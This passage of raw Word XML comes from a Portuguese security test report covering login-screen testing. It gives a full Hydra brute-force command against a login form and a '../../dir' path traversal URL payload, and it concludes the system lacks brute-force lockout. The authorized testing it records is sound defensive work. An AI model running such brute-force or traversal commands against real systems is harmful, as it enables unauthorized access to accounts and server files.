      </w:r>
      <w:r w:rsidR="000A6729" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proteção Antis</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pam, como Captcha que impeça a ferramenta automatizada de prosseguir até o fim do teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A6729" w:rsidRPr="00F15F82" w:rsidRDefault="000A6729" w:rsidP="00AC1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62442F" w:rsidRDefault="0062442F" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707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Comando utilizado:</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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hydra -l admin -P forcaBruta IP_do_servidor http-post-form “</w:t>
      </w:r>
      <w:r w:rsidR="00DD5893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r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/login.php:login=^USER^:senha=^PASS^:logado=false” -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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AC10DC" w:rsidP="00AC10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No comando acima:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED180C" w:rsidRPr="007260B8" w:rsidRDefault="00ED180C" w:rsidP="0063043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highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>“hydra” executa a ferramenta Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="0063043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260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“-l” significa o login utilizado no momento. Nesse caso, deve ser sempre “admin”, pois foi o único usuário válido fornecido para a realização de testes no </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado</w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="0063043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260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“-P” aponta para o arquivo contendo as senhas que a Hydra tentará utilizar para acessar o sistema;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="0063043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260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“IP_do_servidor” é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00DD5893" w:rsidP="0063043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http-post-form” informa</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o método utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>para fazer a requisição ao servidor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Pr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>do protocolo</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00265100" w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="0063043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260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="000C72B3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r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/login.php:login=^USER^:senha=^PASS^:logado=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é a URL utilizada para fazer a requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="326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260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">USER é onde a Hydra deve inserir o </w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="326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260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS é onde a Hydra deve inserir a </w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha</w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> válida usada na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="007260B8" w:rsidRDefault="008C6DC7" w:rsidP="0063043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260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“-V” é para exibir no console o resultado da operação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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C10DC" w:rsidRDefault="005967D5" w:rsidP="00AC10DC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76417A" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C" w:rsidP="00AC10DC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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema não p</w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00456110" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conforme mostra a figura 1, todas as tentativas configuradas na Hydra foram executadas com sucesso.</w:t>
      </w:r>
      <w:r w:rsidR="00456110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="00FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="0076417A"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sistema é vulnerável ao acesso via força</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69"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</w:t>
      </w:r>
      <w:r w:rsidR="00FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">bruta, pois permite que </w:t>
      </w:r>
      <w:r w:rsidR="0076417A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>várias requisições sejam feitas ao servidor por tempo</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69"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</w:t>
      </w:r>
      <w:r w:rsidR="0076417A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>indeterminado. Como não há mecanismo de bloqueio para</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69"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</w:t>
      </w:r>
      <w:r w:rsidR="00FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>inúmeras requisições</w:t>
      </w:r>
      <w:r w:rsidR="0076417A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>, o sistema abre uma brecha para</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69"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</w:t>
      </w:r>
      <w:r w:rsidR="0076417A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>que senhas de acesso ao sistema possam ser descobertas após</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69"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</w:t>
      </w:r>
      <w:r w:rsidR="0076417A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>várias tentativas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456110" w:rsidRPr="00F15F82" w:rsidRDefault="00456110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654DE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53A9FEF5" wp14:editId="3BA6EEAC">
            <wp:extent cx="5400040" cy="3820160"/>
            <wp:effectExtent l="0" t="0" r="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                                             Figura 1 - Resultado da operação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A089C" w:rsidRPr="00F15F82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F15F82" w:rsidRDefault="00E650F5" w:rsidP="00E650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4.3.1.2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. Tela Login - Exploração via Path Transversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC1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Tarefa realizada entre os dias 31/03/16 e 01/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C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: 2 horas e 30 minutos. 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1557DC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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ara identificar a estrutura de diretório</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s do sistema dentro do servidor, f</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oi utilizada</w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">funcionalidade </w:t>
      </w:r>
      <w:r w:rsidR="00E158B8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Burp Spider</w:t>
      </w:r>
      <w:r w:rsidR="00E158B8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="0045732E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a ferramenta Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, ambas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">abordadas no subcapítulo 3.2. </w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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Os resultados obtidos, conforme mostra a figura 2, foram utilizados para executar os testes deste tópico.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A7473" w:rsidRPr="00F15F82" w:rsidRDefault="008A7473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A7473" w:rsidP="002D436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3FCCEF39" wp14:editId="34022809">
            <wp:extent cx="2507141" cy="317182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2(Editada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141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1F" w:rsidRPr="00F15F82" w:rsidRDefault="00623C1F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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 2 - Resultado mapeamento diretórios do sistema</w:t>
      </w:r>
      <w:r w:rsidR="002D4365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BD33F6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bjetivo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00846A20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Dada a estrutura hierárquica do sistema descrita na figura </w:t>
      </w:r>
      <w:r w:rsidR="00BE4C3F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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, o objetivo do teste é utilizar entradas maliciosas na URL para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conseguir acesso a loca</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is não autorizados a um usuário</w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do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sistema.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D4365" w:rsidRDefault="002D4365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F15F82" w:rsidRDefault="0048383A" w:rsidP="00284BB3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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00284BB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707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Quando o sistema não consegue efetuar um login, o seguinte parâmetro é exibido na url: </w:t>
      </w:r>
      <w:r w:rsidR="002D4365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/login.php?</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F8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logado</w:t>
      </w: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=false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B959F5" w:rsidP="00284BB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707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A primeira </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essão de teste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é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fazer uma requisição ao servidor alterando a url citada anteriormente para: </w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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/login.php?logado=../../dir, </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82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="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DF0646" w:rsidRPr="00F15F82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:rsidR="00827015" w:rsidRDefault="00827015" w:rsidP="00827015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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00284BB3" w:rsidP="0063043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O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comando “../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00284BB3" w:rsidP="0063043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O comando </w:t>
      </w:r>
      <w:r w:rsidR="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dir,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no</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidR="00BA7CEE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistema operacional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Windows</w:t>
      </w:r>
      <w:r w:rsidR="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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serve para listar os arquivos e diretórios dentro da pasta atual.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00827015" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00827015">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00827015" w:rsidRPr="00827015" w:rsidRDefault="00827015" w:rsidP="00284BB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27015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8C6DC7" w:rsidRPr="00284BB3" w:rsidRDefault="00827015" w:rsidP="00284BB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707" w:firstLine="708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284BB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Espera-se que o sistema bloqueie o acesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00827015" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00827015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27015" w:rsidRDefault="005967D5" w:rsidP="00284BB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
